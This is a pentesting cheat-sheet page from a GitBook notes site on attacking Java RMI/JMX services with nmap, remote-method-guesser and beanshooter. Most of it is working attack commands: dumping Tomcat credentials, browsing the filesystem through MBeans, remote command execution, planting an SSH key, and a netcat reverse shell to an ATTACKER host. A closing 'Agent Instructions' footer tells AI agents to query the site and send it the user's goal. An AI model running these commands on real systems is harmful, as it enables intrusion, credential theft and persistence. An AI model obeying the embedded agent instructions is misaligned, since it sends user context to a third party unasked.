> For the complete documentation index, see [llms.txt](https://book.ice-wzl.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.ice-wzl.xyz/recon-enumeration/pentesting-java-rmi-jmx.md). # Pentesting Java RMI/JMX ## Discovery ```bash # Nmap identifies RMI nmap -sC -sV TARGET -p 1099,2222,9010 # Common RMI output 2222/tcp open java-rmi Java RMI | rmi-dumpregistry: | jmxrmi | javax.management.remote.rmi.RMIServerImpl_Stub ``` **Common Ports:** * 1099 - Default RMI registry * 2222 - Alternative RMI * 9010 - JMX remote *** ## remote-method-guesser (rmg) Tool for Java RMI vulnerability scanning. ### Installation ```bash # Download release wget https://github.com/qtc-de/remote-method-guesser/releases/download/v5.1.0/rmg-5.1.0-jar-with-dependencies.jar ``` ### Enumeration ```bash # Basic enumeration java -jar rmg-5.1.0-jar-with-dependencies.jar enum TARGET 2222 # Output shows: # - Bound names (jmxrmi) # - Codebase enumeration # - Security manager status # - JEP290 status # - CVE-2019-2684 status ``` ### Method Guessing ```bash # Guess available methods java -jar rmg-5.1.0-jar-with-dependencies.jar guess TARGET 2222 # Example output: # [+] - jmxrmi # [+] --> String getVersion() # [+] --> javax.management.remote.rmi.RMIConnection newClient(Object params) ``` ### Known Objects Info ```bash # Get info on known RMI objects java -jar rmg-5.1.0-jar-with-dependencies.jar known javax.management.remote.rmi.RMIServerImpl_Stub # Shows vulnerabilities like MLet and Deserialization attacks ``` *** ## Beanshooter (JMX Exploitation) JMX enumeration and attacking tool. ### Installation ```bash # Download release wget https://github.com/qtc-de/beanshooter/releases/download/v4.1.0/beanshooter-4.1.0-jar-with-dependencies.jar # Or build from source for full features (tonka shell) sudo apt install maven git clone https://github.com/qtc-de/beanshooter cd beanshooter mvn package cd tonka-bean/ mvn package ``` ### Enumeration ```bash # Basic enumeration java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum TARGET 2222 # Check for unauthorized access, deserialization, available MBeans # [+] - Remote MBean server does not require authentication. # Vulnerability Status: Vulnerable ``` ### Enumerate Tomcat Users via JMX ```bash # If JMX is connected to Tomcat, can enumerate users java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum TARGET 2222 # Output: # [+] Enumerating tomcat users: # [+] - Listing 2 tomcat users: # [+] Username: manager # [+] Password: fhErvo2r9wuTEYiYgt # [+] Roles: manage-gui ``` ### List MBeans ```bash java -jar beanshooter-4.1.0-jar-with-dependencies.jar list TARGET 2222 java -jar beanshooter-4.1.0-jar-with-dependencies.jar info TARGET 2222 ``` ### File System Access via Model MBean Deploy a Model MBean with java.io.File to enumerate the filesystem: ```bash # Deploy MBean with java.io.File java -jar beanshooter-4.1.0-jar-with-dependencies.jar model TARGET 2222 de.qtc.beanshooter:version=1 java.io.File 'new java.io.File("/")' # List directory contents java -jar beanshooter-4.1.0-jar-with-dependencies.jar invoke TARGET 2222 de.qtc.beanshooter:version=1 --signature 'list()' # Change directory java -jar beanshooter-4.1.0-jar-with-dependencies.jar invoke TARGET 2222 de.qtc.beanshooter:version=1 --signature 'setManagedResource(Object a, String b)' 'new java.io.File("/home")' objectReference # List new directory java -jar beanshooter-4.1.0-jar-with-dependencies.jar invoke TARGET 2222 de.qtc.beanshooter:version=1 --signature 'list()' ``` ### Remote Code Execution via StandardMBean ```bash # Execute command (uses TemplateImpl payload) java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 exec 'whoami' # Write SSH key java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 exec 'echo "ssh-ed25519 AAAA..." >> /home/user/.ssh/authorized_keys' # Reverse shell (may need /bin/bash wrapper) java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 exec '/bin/bash -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ATTACKER 9001 >/tmp/f"' ``` ### Tonka Shell (Full Build Required) ```bash # Deploy tonka java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 tonka # Get interactive shell java -jar beanshooter-4.1.0-jar-with-dependencies.jar tonka shell TARGET 2222 [tomcat@TARGET /]$ whoami tomcat ``` *** ## References * * * --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://book.ice-wzl.xyz/recon-enumeration/pentesting-java-rmi-jmx.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.